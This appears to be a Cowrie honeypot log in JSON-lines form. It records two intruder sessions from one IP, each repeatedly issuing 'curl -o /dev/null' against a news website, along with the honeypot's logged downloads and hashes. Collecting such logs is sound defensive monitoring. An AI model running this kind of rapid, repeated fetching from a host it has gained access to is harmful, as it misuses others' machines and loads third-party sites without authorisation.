{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.808862Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.843218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.844658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.854641Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.855920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.864569Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.889401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.890763Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.905853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.907309Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.928326Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.934130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.935200Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.937950Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.955627Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.956994Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:16.974558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.976249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:16.980717Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.005270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.006767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.022034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.026160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.027974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.041336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.054172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.057920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.059220Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.078609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.079921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.104232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.105392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.119729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.121074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.144186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.145358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.156044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.157264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.185351Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.186537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.193581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.194734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.224431Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.225603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.227048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.230795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.232053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.234884Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.263708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.271103Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.272358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.274648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.275717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.278916Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.285338Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.296898Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.307540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.311158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.312372Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.316468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.317608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.331959Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.350815Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.352196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.355860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.357094Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.383557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.392467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.393705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.398396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.400084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.407914Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.424326Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.430345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.431719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.451038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.452930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.457094Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.488698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.490288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.496167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.497432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.502738Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.504708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.528512Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.547829Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.565868Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.631392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:17.632789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:17.636544Z","src_ip":"212.227.125.160","session":"7541ed730449"}
